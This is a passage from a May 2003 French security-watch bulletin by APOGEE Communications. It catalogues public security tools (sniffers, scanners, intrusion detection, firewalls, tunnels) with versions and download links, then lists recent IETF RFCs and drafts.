des listes
de certificats
de l’annuaire
Date
Source
10/05/03
15/01/00
28/02/03
08/05/03
http://www.isc.org/products/INN
http://www.greatcircle.com/majordomo
http://www.openca.org/openca/download-releases.shtml
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/
OUTILS
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les
tableaux suivants.
LANGAGES
Nom
$ SPLINT
Perl
PHP
Fonction
Ver.
Analyse de code
Scripting
WEB Dynamique
3.1.1
5.8.0
4.3.1
Date
Source
25/05/03 http://lclint.cs.virginia.edu
12/08/02 http://www.cpan.org/src/index.html
17/02/03 http://www.php.net/downloads.php
ANALYSE RESEAU
Nom
Big Brother
Dsniff
$ EtterCap
$ Ethereal
IP Traf
Nstreams
SamSpade
TcpDump
Libpcap
TcpFlow
TcpShow
WinPCap
Fonction
Ver.
Visualisateur snmp
Boite à outils
Analyse & Modification
Analyse multiprotocole
Statistiques IP
Générateur de règles
Boite à outils
Analyse multiprotocole
Acquisition Trame
Collecte données
Collecte données
Acquisition Trame
1.9c
2.3
0.6.a
0.9.12
2.7.0
1.0.3
1.14
3.7.2
0.7.2
0.20
1.81
3.0
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Date
Source
15/05/02
17/12/00
03/05/03
01/05/03
19/05/02
06/08/02
10/12/99
27/02/02
27/02/02
26/02/01
21/03/00
10/04/03
http://bb4.com/
http://www.monkey.org/~dugsong/dsniff
http://ettercap.sourceforge.net/index.php?s=history
http://www.ethereal.com
http://cebu.mozcom.com/riker/iptraf/
http://www.hsc.fr/ressources/outils/nstreams/download/
http://www.samspade.org/ssw/
http://www.tcpdump.org/
http://www.tcpdump.org/
http://www.circlemud.org/~jelson/software/tcpflow/
http://ftp7.usa.openbsd.org/pub/tools/unix/sysutils/tcpshow
http://winpcap.polito.it/news.htm
Page 21/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
ANALYSE DE JOURNAUX
Nom
Fonction
Ver.
Analog
Autobuse
SnortSnarf
WebAlizer
Journaux serveur http
Analyse syslog
Analyse Snort
Journaux serveur http
5.32
1.13
021111
2.01-10
Date
Source
23/03/03
31/01/00
02/11/02
24/04/02
http://www.analog.cx
http://www.picante.com/~gtaylor/autobuse
http://www.silicondefense.com/software/snortsnarf/
http://www.mrunix.net/webalizer/download.html
ANALYSE DE SECURITE
Nom
FIRE
$ curl
$ Nessus
Nmap
Pandora
$ Saint
Sara
Tara (tiger)
Tiger
Trinux
Whisker
Fonction
Ver.
Boite à outils
Analyse http et https
Vulnérabilité réseau
Vulnérabilité réseau
Vulnérabilité Netware
Vulnérabilité réseau
Vulnérabilité réseau
Vulnérabilité système
Vulnérabilité système
Boite à outils
LibWhisker
0.3.5b
7.10.5
2.0.6
3.27
4.0b2.1
4.3.1
4.1.4c
3.0.3
2.2.4p1
0.81pre0
1.6
Date
Source
29/11/02
19/05/03
22/05/03
28/04/03
12/02/99
25/05/03
14/03/03
15/08/02
19/07/99
07/11/01
29/11/02
http://biatchux.dmzs.com/
http://curl.haxx.se/
http://www.nessus.org
http://www.insecure.org/nmap/nmap_download.html
http://www.packetfactory.net/projects/pandora/
http://www.saintcorporation.com/updates.html
http://www.www-arc.com/sara/downloads/
http://www-arc.com/tara
ftp://net.tamu.edu/pub/security/TAMU/tiger
http://sourceforge.net/projects/trinux/
http://www.wiretrip.net/rfp/p/doc.asp?id=21
CONFIDENTIALITE
Nom
OpenPGP
$ GPG
Fonction
Ver.
Signature/Chiffrement
Signature/Chiffrement
1.2.2
Date
Source
http://www.openpgp.org
03/05/03 http://www.gnupg.org
CONTROLE D’ACCES
Nom
Fonction
Ver.
TCP Wrapper
Xinetd
Accès services TCP
Inetd amélioré
7.6
2.3.11
Date
Source
ftp://ftp.cert.org/pub/tools/tcp_wrappers
15/04/03 http://synack.net/xinetd/
CONTROLE D’INTEGRITE
Nom
Fonction
Ver.
Tripwire
ChkRootKit
Intégrité LINUX
Compromission UNIX
2.3.47
0.40
Date
Source
15/08/00 http://www.tripwire.org/downloads/index.php
03/04/03 http://www.chkrootkit.org/
DETECTION D’INTRUSION
Nom
Fonction
Deception TK Pot de miel
LLNL NID
IDS Réseau
Snort
IDS Réseau
$ Shadow
IDS Réseau
Ver.
19990818
2.6
2.0.0
1.8
Date
Source
18/08/99
10/10/02
14/04/03
30/04/03
http://all.net/dtk/index.html
http://ciac.llnl.gov/cstc/nid/nid.html
http://www.snort.org/dl/
http://www.nswc.navy.mil/ISSEC/CID/
GENERATEURS DE TEST
Nom
Fonction
Ver.
Elza
FireWalk
IPSend
IDSWakeUp
UdpProbe
Requêtes HTTP
Analyse filtres
Paquets IP
Détection d’intrusion
Paquets UDP
1.4.5
5.0
2.1a
1.0
1.2
Date
Source
01/04/00
20/10/02
19/09/97
13/10/00
13/02/96
http://www.stoev.org/elza/project-news.html
http://www.packetfactory.net/firewalk
ftp://coombs.anu.edu.au/pub/net/misc
http://www.hsc.fr/ressources/outils/idswakeup/download/
http://sites.inka.de/sites/bigred/sw/udpprobe.txt
PARE-FEUX
Nom
Fonction
Ver.
DrawBridge
IpFilter
PareFeu FreeBsd
Filtre datagramme
3.1
3.4.31
Date
Source
19/04/00 http://drawbridge.tamu.edu
07/12/02 http://coombs.anu.edu.au/ipfilter/ip-filter.html
TUNNELS
Nom
Fonction
Ver.
Date
Source
CIPE
FreeSwan
http-tunnel
OpenSSL
OpenSSH
Stunnel
TeraTerm Pro
Zebedee
Pile Crypto IP (CIPE)
Pile IPSec
Encapsulation http
Pile SSL
Pile SSH 1 et 2
Proxy https
Terminal SSH2
Tunnel TCP/UDP
1.5.4
2.00
3.0.5
0.9.7b
3.6.1
4.04
3.1.3
2.4.1
29/06/01
28/04/03
06/12/00
10/04/03
01/04/03
12/01/03
08/10/02
29/05/02
http://sites.inka.de/sites/bigred/devel/cipe.html
http://www.freeswan.org
http://www.nocrew.org/software/httptunnel.html
http://www.openssl.org/
http://www.openssh.com/
http://www.stunnel.org
http://www.ayera.com/teraterm/
http://www.winton.org.uk/zebedee/
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 22/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
NO
OR
RM
ME
ES
SE
ET
T ST
TA
AN
ND
DA
AR
RD
DS
S
LES
LES
PUBLICATIONS DE L’IETF
RFC
Du 24/04/2003 au 28/05/2003, 16 RFC ont été publiés dont 1 RFC ayant trait à la
sécurité.
RFC TRAITANT DE LA SECURITE
Thème
IKE
Num Date Etat Titre
3526
05/03 Pst
More Modular Exponential (MODP) Diffie-Hellman groups for Internet Key Exchange (IKE)
RFC TRAITANT DE DOMAINES CONNEXES A LA SECURITE
Thème
Num Date Etat Titre
NFS
3530
04/03 Pst
Network File System (NFS) version 4 Protocol
AUTRES RFC
Thème
APEX
BEEP
DHCP
IETF
IPV6
MEDIA
NET
OGG
SLP
TCP
URN
LES
Num Date Etat Titre
3343
3529
3527
3535
3536
3316
3531
3524
3532
3533
3534
3528
3522
3541
04/03
04/03
04/03
05/03
05/03
04/03
04/03
04/03
05/03
05/03
05/03
04/03
04/03
05/03
Exp
Exp
Pst
Inf
Inf
Inf
Inf
Pst
Inf
Inf
Pst
Exp
Exp
Inf
The Application Exchange (APEX) Presence Service
Using XML-RPC in Blocks Extensible Exchange Protocol (BEEP)
Link Selection sub-option for the Relay Agent Information Option for DHCPv4
Overview of the 2002 IAB Network Management Workshop
Terminology Used in Internationalization in the IETF
Internet Protocol Version 6 (IPv6) for Some Second and Third Generation Cellular Hosts
A Flexible Method for Managing the Assignment of Bits of an IPv6 Address Block
Mapping of Media Streams to Resource Reservation Flows
Requirements for the Dynamic Partitioning of Switching Elements
The Ogg Encapsulation Format Version 0
The application/ogg Media Type
Mesh-enhanced Service Location Protocol (mSLP)
The Eifel Detection Algorithm for TCP
A Uniform Resource Name (URN) Namespace for the Web3D Consortium (Web3D)
DRAFTS
Du 24/04/2003au 28/05/2003, 271 drafts ont été publiés: 192 drafts mis à jour, 79
nouveaux drafts, dont 11 drafts ayant directement trait à la sécurité.
NOUVEAUX DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
AUTH
IPSEC
draft-iab-auth-mech-00
draft-goswami-ipsec-espll-00
draft-guichard-ce-ce-ipsec-00
draft-ietf-ipsec-ikev2-algorithms-00
draft-kempf-abk-nd-00
draft-ietf-msec-tgsakmp-00
draft-ietf-krb-wg-kerberos-set-passwd-00
draft-mohanp-pana-ipsec-00
draft-ietf-sasl-rfc2222bis-00
Draft-umschaden-smime-midc-sip-proxy-00
draft-ietf-smime-cms-rsa-kem-00
28/04
05/05
02/05
19/05
07/05
20/05
06/05
13/05
20/05
06/05
19/05
IPV6
ISAKMP
KRB
PANA
SASL
SIP
SMIME
A Survey of Authentication Mechanisms
Encapsulating Security Payload for Link Layers (ESPLL)
CE-CE IPSec within an RFC-2547 Network
Cryptographic Algorithms for use in the Internet Key Exchange V2
Securing IPv6 Neighbor Discovery Using Address Based Keys
Tunneled Group Secure Association Key Management Protocol
Kerberos Set/Change Password: Version 2
Securing the first hop in PANA using IPsec
Simple Authentication and Security Layer (SASL)
End-to-end Security for Firewall/NAT Traversal within SIP
Use of the RSA-KEM Key Transport Algorithm in CMS
MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
AAA
draft-perkins-aaav6-06
draft-irtf-aaaarch-handoff-02
draft-ietf-eap-rfc2284bis-03
draft-ietf-ipsec-ciph-aes-cbc-05
draft-ietf-ipseckey-rr-01
09/05
21/05
16/05
02/05
29/04
EAP
IPSEC
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
AAA for IPv6 Network Access
Experimental Handoff Extension to RADIUS
Extensible Authentication Protocol (EAP)
The AES Cipher Algorithms and Their Use With IPsec
A method for storing IPsec keying material in DNS
Page 23/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
MOBILEIP
MSEC
NFSV4
OTP
PANA
PKIX
RADIUS
RTP
SASL
SMIME
SSH
XMPP
draft-ietf-ipsp-ipsecpib-08
draft-hoffman-ipsec-algorithms-02
draft-ietf-mobileip-aaa-key-12
draft-ietf-msec-arch-01
draft-ietf-nfsv4-ccm-01
draft-nesser-otp-sha-256-384-512-02
draft-ietf-pana-threats-eval-04
draft-ietf-pkix-proxy-06
draft-ietf-pkix-ipki-new-rfc2527-02
draft-chiba-radius-dynamic-authorization-20
draft-aboba-radius-rfc2869bis-22
draft-ietf-avt-srtp-06
draft-ietf-sasl-anon-01
draft-ietf-sasl-plain-01
draft-ietf-sasl-saslprep-01
draft-ietf-smime-examples-10
draft-ietf-smime-x400transport-07
draft-ietf-smime-x400wrap-06
draft-ietf-smime-pss-01
draft-ietf-secsh-auth-kbdinteract-05
draft-ietf-xmpp-e2e-03
19/05
16/05
21/05
08/05
19/05
05/05
19/05
09/05
25/04
16/05
16/05
30/04
05/05
05/05
05/05
28/04
12/05
01/05
30/04
29/04
21/05
IPSec Policy Information Base
Security Algorithms for IKEv2
AAA Registration Keys for Mobile IP
The Multicast Security (MSEC) Architecture
The Channel Conjunction Mechanism (CCM) for GSS
One-Time Passwords with SHA-256, SHA-384, SHA-512
PANA Threat Analysis and security requirements
Internet X.509 PKI Proxy Certificate Profile
Internet X.509 PKI Certificate Policy & Certif. Practices Framework
Dynamic Authorization Extensions to RADIUS
RADIUS Support For Extensible Authentication Protocol (EAP)
The Secure Real-time Transport Protocol
The Anonymous SASL Mechanism
The Plain SASL Mechanism
SASLprep: Stringprep profile for user names and passwords
Examples of S/MIME Messages
Transporting S/MIME Objects in X.400
Securing X.400 Content with S/MIME
Use of the PSS Signature Algorithm in CMS
Generic Message Exchange Authentication For SSH
End-to-End Object Encryption in XMPP
DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE
Thème
Nom du Draft
Date Titre
AAA
draft-ietf-aaa-diameter-mobileip-14
draft-hakala-aaa-diameter-cc-00
draft-ietf-bmwg-mcastm-12
draft-ietf-bmwg-dsmterm-06
draft-ietf-bmwg-ospfconv-term-04
draft-ietf-bmwg-ospfconv-intraarea-05
draft-ietf-bmwg-ospfconv-applicability-03
draft-kimura-protection-term-01
draft-joslin-config-schema-06
draft-moskowitz-hip-06
draft-moskowitz-hip-arch-03
draft-sheng-isis-bgp-mpls-vpn-00
draft-galtzur-l2tpext-gr-00
draft-ietf-ldapbis-dn-10
draft-ietf-ldapbis-user-schema-05
draft-zeilenga-ldap-grouping-06
draft-zeilenga-ldap-txn-06
draft-zeilenga-ldap-cancel-08
draft-zeilenga-ldap-t-f-05
draft-zeilenga-ldap-noop-01
draft-klasen-ldap-facs-tel-number-match-01
draft-zeilenga-ldapbis-strprep-00
draft-apurva-ldap-query-containment-00
draft-zeilenga-ldap-assert-00
draft-zeilenga-ldap-uuid-00
draft-ietf-ldup-lcup-05
draft-zeilenga-ldup-sync-02
draft-zeilenga-ldup-harmful-00
draft-ietf-policy-qos-info-model-05
draft-pitta-redundant-fault-tol-conf-00
draft-ietf-ccamp-tracereq-02
draft-ietf-ppvpn-bgpvpn-auto-05
draft-ietf-ppvpn-vpn-vr-04
29/04
06/05
05/05
02/05
22/05
22/05
22/05
25/04
01/05
15/05
07/05
13/05
20/05
05/05
01/05
05/05
05/05
05/05
05/05
05/05
14/05
05/05
06/05
12/05
12/05
29/04
06/05
05/05
06/05
05/05
14/05
13/05
05/05
BENCH
CONFIG
HIP
ISIS
L2TP
LDAP
LDUP
POLICY
REDUND
TRACE
VPN
Diameter Mobile IPv4 Application
Diameter Credit-control Application
Methodology for IP Multicast Benchmarking
Benchmarking Network-layer Traffic Control Mechanisms
OSPF Benchmarking Terminology and Concepts
Benchmarking Methodology for Basic OSPF Convergence
Benchmarking Applicability for Basic OSPF Convergence
Benchmarking Terminology for Protection Performance
A Configuration Schema for LDAP Based Directory User Agents
Host Identity Protocol
Host Identity Protocol Architecture
ISIS as the PE/CE Protocol in BGP/MPLS VPNs
Layer Two Tunneling Protocol (Version 3) Graceful Restart
LDAP:String Representation of Distinguished Names
LDAP: User Schema
LDAPv3: Grouping of Related Operations
LDAPv3 Transactions
LDAP Cancel Extended Operation
LDAP Absolute True and False Filters
The LDAP No-Op Control
LDAP: matching rules for facsimile telephone numbers
LDAP: Internationalized String Preparation
Schema to Support Query Containment in LDAP Directories
The LDAP Assertion Control
The LDAP entryUUID operational attribute
LDAP Client Update Protocol
LDAP Content Synchronization Operation
LDAP Multi-master Replication Considered Harmful
Policy QoS Information Model
Redundant Fault Tolerant Configurations
Tracing Requirements for Generic Tunnels
BGP as Auto-Discovery Mechanism for Provider-provisioned VPNs
Network based IP VPN Architecture using Virtual Routers
AUTRES DRAFTS
Thème
Nom du Draft
Date Titre
ASAP
draft-ietf-rserpool-asap-07
draft-ietf-rserpool-common-param-04
draft-dickel-ascertech-base-01
draft-ietf-bgmp-spec-04
draft-ietf-ptomaine-nopeer-03
draft-ietf-idr-bgp-analysis-03
draft-lonnfors-simple-binpidf-01
draft-ietf-impp-im-03
draft-ietf-impp-pres-03
draft-ietf-crisp-requirements-05
draft-ietf-dccp-ccid2-02
draft-ietf-dccp-ccid3-02
draft-ietf-dccp-spec-03
draft-ietf-dhc-isnsoption-06
16/05
16/05
02/05
21/05
13/05
13/05
08/05
20/05
20/05
12/05
12/05
12/05
20/05
06/05
ASCERTE
BGMP
BGP4
BINPIDF
CPIM
CPP
CRISP
DCCP
DHCP
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Aggregate Server Access Protocol (ASAP)
Aggregate Server Access Protocol & Endpoint Name Resolution
Ascertech's Billing & Accounting System Exchange Protocol
Border Gateway Multicast Protocol (BGMP): Protocol Specification
NOPEER community for BGP route scope control
BGP-4 Protocol Analysis
External Object Extension to Presence Information Data Format
Common Profile for Instant Messaging (CPIM)
Common Profile for Presence (CPP)
Cross Registry Internet Service Protocol (CRISP) Requirements
DCCP Congestion Control ID 2:TCP-like Congestion Control
DCCP Congestion Control ID 3:TFRC Congestion Control
Datagram Congestion Control Protocol (DCCP)
The IPv4 DHCP Options for the Internet Storage Name Service
Page 24/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
DMA
DMIB
DNS
DOI
DSP
E164
ECMP
ENRP
ENUM
EPP
EXTREME
FCS
FIRS
GDOI
GEOPRIV
GSTN
I18N
IEPREP
IETF
IGMP
IMAP
IMP
IP
IPCDN
IPO
IPR
IPV6
IRC
LDAP
LWAPP
MAIL
MBONED
MDN
MEGACO
MIB
draft-ietf-dhc-extended-optioncodes-00
draft-callaghan-rpcrdma-00
draft-ietf-disman-alarm-mib-12
draft-ietf-dnsext-mdns-20
draft-ietf-dnsext-delegation-signer-14
draft-ietf-dnsext-insensitive-03
Draft-ietf-dnsext-dnssec-2535type-change-00
draft-josefsson-dns-url-08
draft-main-addr-dns-rep-00
draft-paskin-doi-uri-03
draft-rajeshkumar-mmusic-gpmd-03
draft-foster-e164-gstn-npusa-06
draft-bhatia-ecmp-routes-in-bgp-00
draft-ietf-rserpool-enrp-06
draft-ietf-enum-rfc2916bis-06
draft-zygmuntowicz-epp-pltld-00
draft-hollenbeck-epp-rgp-00
draft-shah-extreme-eaps-03
draft-canessa-fcs-api-00
draft-ietf-crisp-firs-arch-00
draft-ietf-crisp-firs-core-00
draft-ietf-crisp-firs-dns-00
draft-ietf-crisp-firs-dnsrr-00
draft-ietf-crisp-firs-contact-00
draft-ietf-crisp-firs-ipv4-00
draft-ietf-crisp-firs-ipv6-00
draft-ietf-crisp-firs-asn-00
draft-ietf-msec-gdoi-08
draft-ietf-geopriv-dhcp-lci-option-00
draft-allocchio-gstn-05
draft-newman-i18n-comparator-00
draft-ietf-ieprep-ets-telephony-04
draft-polk-ieprep-flow-model-consideration-01
draft-ietf-ipr-technology-rights-06
draft-ietf-ipr-template-00
draft-ietf-nomcom-rfc2727bis-04
draft-mrose-ietf-posting-03
draft-carpenter-solution-sirs-00
draft-ietf-problem-issue-statement-01
draft-ietf-problem-process-00
draft-ietf-magma-snoop-07
draft-ietf-imapext-sort-13
draft-ietf-imapext-annotate-07
draft-ietf-imapext-i18n-00
draft-daboo-imap-annotatemore-03
draft-ietf-impp-srv-03
draft-ietf-forces-requirements-09
draft-ietf-ipoib-ip-over-infiniband-04
draft-eastlake-ip-mime-08
draft-clausen-ipdvb-enc-01
draft-main-ipaddr-text-rep-00
draft-syam-ip-state-model-00
draft-ietf-ipcdn-pktc-mtamib-01
draft-ietf-ipo-impairments-05
draft-savola-ipr-lastcall-01
draft-ietf-multi6-multihoming-requ-06
draft-ogura-ipv6-mapos-02
draft-desanti-ipv6-over-fibre-channel-01
draft-hain-ipv6-sitelocal-01
draft-savola-multi6-nowwhat-00
draft-hinden-ipv6-global-local-addr-00
draft-brocklesby-irc-isupport-02
draft-legg-ldap-gser-abnf-06
draft-legg-ldap-gser-03
draft-calhoun-seamoby-lwapp-01
draft-bajaj-mail-srv-00
draft-savola-mboned-mcast-rpaddr-03
draft-vaudreuil-mdnbis-04
draft-ietf-megaco-mib-05
draft-schwarz-megaco-relay-services-01
draft-ietf-adslmib-vdsl-09
draft-ietf-atommib-atm2-19
draft-ietf-atommib-rfc2496bis-02
draft-ietf-atommib-rfc2495bis-02
draft-ietf-entmib-v3-01
draft-ietf-hubmib-power-ethernet-mib-05
draft-ietf-hubmib-1643-to-historic-01
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
19/05
15/05
29/04
21/05
06/05
30/04
15/05
21/05
13/05
08/05
20/05
08/05
14/05
16/05
13/05
13/05
19/05
16/05
21/05
19/05
19/05
19/05
19/05
19/05
19/05
19/05
19/05
08/05
12/05
30/04
12/05
28/04
16/05
20/05
06/05
09/05
12/05
07/05
12/05
12/05
06/05
15/05
20/05
12/05
20/05
20/05
21/05
01/05
07/05
20/05
02/05
14/05
09/05
08/05
09/05
16/05
25/04
01/05
12/05
25/04
08/05
13/05
07/05
07/05
05/05
08/05
22/05
12/05
29/04
12/05
01/05
14/05
06/05
06/05
12/05
22/05
04/05
Extending DHCP Options Codes
RDMA Transport for ONC RPC
Alarm MIB
Linklocal Multicast Name Resolution (LLMNR)
Delegation Signer Resource Record
Domain Name System (DNS) Case Insensitivity Clarification
Legacy Resolver Compatibility for Delegation Signer
Domain Name System Uniform Resource Identifiers
Mapping Network Addresseses into Domain Name Space
The 'doi' URI Scheme for Digital Object Identifier (DOI)
SDP attribute for qualifying Media Formats with Generic Param.
Number Portability Administration in the U.S.
Advertising Equal Cost Multi-Path (ECMP) routes in BGP
Enpoint Name Resolution Protocol (ENRP)
The E.164 to URI DDDS Application (ENUM)
EPP parameters for .pl ccTLD
Redemption Grace Period Mapping for the EPP
Extreme Networks'Ethernet Automatic Protection Switching V 1
Fixed Content Storage (FCS) Application Programming Interface
Federated Internet Registry Service: Arch. & Implement. Guide
Federated Internet Registry Service: Core Elements
Defining & Locating DNS Domains in the FIRS
Defining & Locating DNS Resource Records in the FIRS
Defining & Locating Contact Information in the FIRS
Defining & Locating IPv4 Address Blocks in the FIRS
Defining & Locating IPv6 Address Blocks in the FIRS
Defining & Locating Autonomous System Numbers in the FIRS
The Group Domain of Interpretation
Location Configuration Information for GEOPRIV
Text string notation for Dial Sequences & GSTN / E.164 addresses
Internet Application Protocol Comparator Registry
IP Telephony Requirements for ETS
Considerations for IEPREP Related Protocol Packet Flow Models
Intellectual Property Rights in IETF Technology
A Template for IETF Patent Disclosures and Licensing Declarations
IAB & IESG Selection, Confirmation, and Recall Process …
A Practice for Revoking Posting Rights to IETF mailing lists
Careful Additional Review of Documents (CARD)by Senior IETF
IETF Problem Statement
IETF Problem Resolution Processes
Considerations for IGMP and MLD Snooping Switches
IMAP - SORT AND THREAD EXTENSION
IMAP ANNOTATE Extension
Internet Message Access Protocol Internationalization
IMAP ANNOTATEMORE Extension
Address Resolution for Instant Messaging and Presence
Requirements for Separation of IP Control and Forwarding
IP encapsulation and address resolution over InfiniBand networks
IP over MIME
Simple Encapsulation for trans. of IP datag. over MPEG-2/DVB
Textual Representation of IPv4 and IPv6 Addresses
State Model for IP Interfaces
MTA MIB for PacketCable 1.0 compliant devices
Impairments And Other Constraints On Optical Layer Routing
Intellectual Property Rights Considerations in Last Calls
Goals for IPv6 Site-Multihoming Architectures
IP Version 6 over MAPOS
IPv6 over Fibre Channel
Local Scope Address Requirements
IPv6 Site Multihoming: Now What?
Globally Unique IPv6 Local Unicast Addresses
IRC RPL_ISUPPORT Numeric Definition
Common Elements of GSER Encodings
Generic String Encoding Rules for ASN.1 Types
Light Weight Access Point Protocol (LWAPP)
Use of SRV records for POP3, POP3S, IMAP and IMAPS.
Embedding the Address of RP in IPv6 Multicast Address
Message Disposition Notification
Megaco MIB
Voiceband Data Transport Services in Megaco/H.248 Networks
Definitions of Managed Objects for VDSL
Definitions of Supplemental Managed Objects for ATM Interface
Definitions of Managed Objects for the DS3/E3 Interface Type
Definitions of Managed Objects for the DS1, E1, DS2, E2 Interface
Entity MIB (Version 3)
Power Ethernet MIB
Applicabil. Stat. for Reclassification of RFC 1643 to Historic Status
Page 25/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
draft-ietf-ips-fcip-mib-04
draft-ietf-midcom-semantics-02
draft-gentric-mmusic-stream-switching-req-00
draft-sjkoh-mobile-sctp-mobileip-01
draft-daley-mobileip-movedetect-01
draft-ietf-mobileip-reg-revok-07
draft-nomad-mobileip-filters-03
draft-bharatia-mobileip-gen-mipv4-ext-01
draft-jung-mobileip-fastho-hmipv6-00
MPLS
draft-ietf-ccamp-gmpls-architecture-07
draft-ietf-ccamp-gmpls-recovery-termino.-02
draft-ietf-mpls-ldp-mib-10
draft-ietf-mpls-ftn-mib-06
draft-ietf-mpls-mgmt-overview-04
draft-ietf-mpls-nodeid-subobject-01
draft-ietf-mpls-telink-mib-02
draft-martini-l2circuit-trans-mpls-11
draft-martini-l2circuit-encap-mpls-05
draft-zhang-mpls-interas-te-req-03
draft-zamfir-explicit-resource-control-bund-01
draft-lai-mpls-mib-rqmts-00
draft-raggarwa-mpls-p2mp-te-00
MRCP
draft-shanmugham-mrcp-04
MSDP
draft-ietf-msdp-spec-19
MSGHEAD draft-newman-msgheader-originfo-05
MTP3
draft-anshoo-test-spec-m3ua-01
MUPDATE draft-siemborski-mupdate-04
NAROS
draft-de-launois-multi6-naros-00
NAT
draft-park-scalable-multi-natpt-00
NCS
draft-ietf-ipcdn-pktc-signaling-01
NEMO
draft-ietf-nemo-requirements-01
draft-ietf-nemo-terminology-00
NFS
draft-callaghan-nfsdirect-00
NFSV4
draft-ietf-nfsv4-rfc1832bis-01
draft-ietf-nfsv4-secinfo-00
draft-ietf-nfsv4-rpc-iana-00
draft-ietf-nfsv4-rfc1831bis-00
draft-talpey-nfsv4-rdma-sess-00
NNTP
draft-ietf-nntpext-base-18
OLSR
draft-ietf-manet-olsr-10
OPS
draft-ietf-ops-ipv6-flowlabel-01
OSPF
draft-lindem-ospf-cap-00
draft-udo-ospf-vendatt-00
draft-ietf-ospf-scalability-04
OWAMP
draft-ietf-ippm-owdp-06
PANA
draft-ietf-pana-usage-scenarios-06
PIDF
draft-ietf-impp-cpim-pidf-08
POLICY
draft-ietf-policy-qos-device-info-model-09
PPP
draft-kehn-info-ppp-ipcp-ext-00
draft-schryver-pppext-iana-00
PROVREG draft-ietf-provreg-epp-ext-02
RDMA
draft-hilland-rddp-verbs-00
RMON
draft-ietf-rmonmib-framework-04
RMT
draft-ietf-rmt-bb-fec-supp-compact-01
ROHC
draft-price-rohc-sigcomp-user-guide-02
draft-price-rohc-sigcomp-torture-tests-02
ROC
draft-ietf-rohc-sigcomp-impl-guide-00
RPSEC
draft-ietf-rpsec-routing-threats-01
RPSLNG
draft-blunk-rpslng-00
RSVP
draft-lang-ccamp-gmpls-recovery-e2e-sig-01
draft-dimitri-ccamp-gmpls-rsvp-te-ason-00
RTP
draft-ietf-avt-rtcp-feedback-06
draft-ietf-avt-mwpp-midi-rtp-07
draft-ietf-avt-rtcp-report-extns-06
SCTP
draft-stewart-tsvwg-prsctp-04
draft-stewart-tsvwg-sctpscore-01
draft-ahmed-lssctp-00
SDP
draft-ietf-mmusic-sdp-srcfilter-05
draft-ietf-mmusic-sdp-new-13
draft-ietf-mmusic-sdp4nat-04
draft-ietf-mmusic-sdpng-trans-04
draft-ietf-mmusic-sdp-bwparam-02
SDXP
draft-wildgrube-gnp-04
SEAMOBY draft-ietf-seamoby-mobility-terminology-04
SERVICE
draft-iab-service-id-considerations-01
SIEVE
draft-showalter-sieve-vacation-05
SIGTRAN draft-ietf-sigtran-rfc3057bis-00
MIDCOM
MMUSIC
MOBILEIP
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
29/04
15/05
16/05
21/05
09/05
22/05
25/04
15/05
14/05
19/05
09/05
01/05
01/05
28/04
19/05
22/05
28/04
28/04
14/05
09/05
30/04
06/05
01/05
22/05
28/05
14/05
15/05
15/05
15/05
08/05
15/05
16/05
15/05
07/05
09/05
20/05
20/05
15/05
25/04
12/05
22/05
15/05
22/05
19/05
20/05
29/04
09/05
19/05
12/05
19/05
13/05
28/04
19/05
14/05
15/05
16/05
15/05
06/05
08/05
09/05
28/04
05/05
20/05
21/05
19/05
06/05
29/04
16/05
22/05
21/05
15/05
14/05
02/05
25/04
12/05
13/05
15/05
Definition of Managed Objects for FCIP
MIDCOM Protocol Semantics
Requirements and Use Cases for Stream Switching
mSCTP with Mobile IP for IP Mobility Support
Movement Detection Optimization in Mobile IPv6
Registration Revocation in Mobile IPv4
Filters for Mobile IPv4 Bindings (NOMADv4)
Mobile IPv4 Extension for Configuration Options Exchange
Fast Handover for Hierarchical MIPv6 (F-HMIPv6)
Generalized Multi-Protocol Label Switching Architecture
Recovery (Protection and Restoration) Terminology for GMPLS
Definitions of Managed Objects for The MPLT LD Protocol
MPLS Forward Equivalency Class-To-Next Hop Label Forwarding …
Multiprotocol Label Switching (MPLS) Management Overview
Definition of an RRO node-id subobject
Traffic Engineering Link Management Information Base
Transport of Layer 2 Frames Over MPLS
Encapsulation Methods for Transport of L2 Frames Over IP & MPLS
MPLS Inter-AS Traffic Engineering requirements
Explicit Resource Control over GMPLS Link Bundles
Network Management Requirements for MPLS MIBs
Establishing Point to Multipoint MPLS TE LSPs
A Media Resource Control Protocol …
Multicast Source Discovery Protocol (MSDP)
Originator-Info Message Header
Test Specification for MTP3 User Adaptation
The MUPDATE Distributed Mailbox Database Protocol
NAROS : Host-Centric IPv6 Multihoming with Traffic Engineering
Scalable mNAT-PT Solution
NCS Signaling MIB for PacketCable/IPCablecom MTAs
Network Mobility Support Goals and Requirements
Network Mobility Support Terminology
NFS Direct Data Placement
XDR: External Data Representation Standard
NFSv4.1: SECINFO Changes
RPC Numbering Authority Transfer to IANA
RPC: Remote Procedure Call Protocol Specification Version 2
NFSv4 RDMA and Session Extensions
Network News Transport Protocol
Optimized Link State Routing Protocol
Textual Conventions for IPv6 Flow Label
Extensions to OSPF for Advertising Optional Router Capabilities
OSPF TE LSA Ext. in Support of Vendor/Org. Specific Attributes
Prioritized Treatment of Specific OSPF Packets & Cong. Avoidance
A One-way Active Measurement Protocol (OWAMP)
Problem Statement and Usage Scenarios for PANA
Presence Information Data Format (PIDF)
Info. Model for Describing Net. Device QoS Datapath Mechanisms
PPP Internet Protocol Control Protocol Ext for Route Table Entries
IANA Considerations for PPP
Guidelines for Extending the Extensible Provisioning Protocol
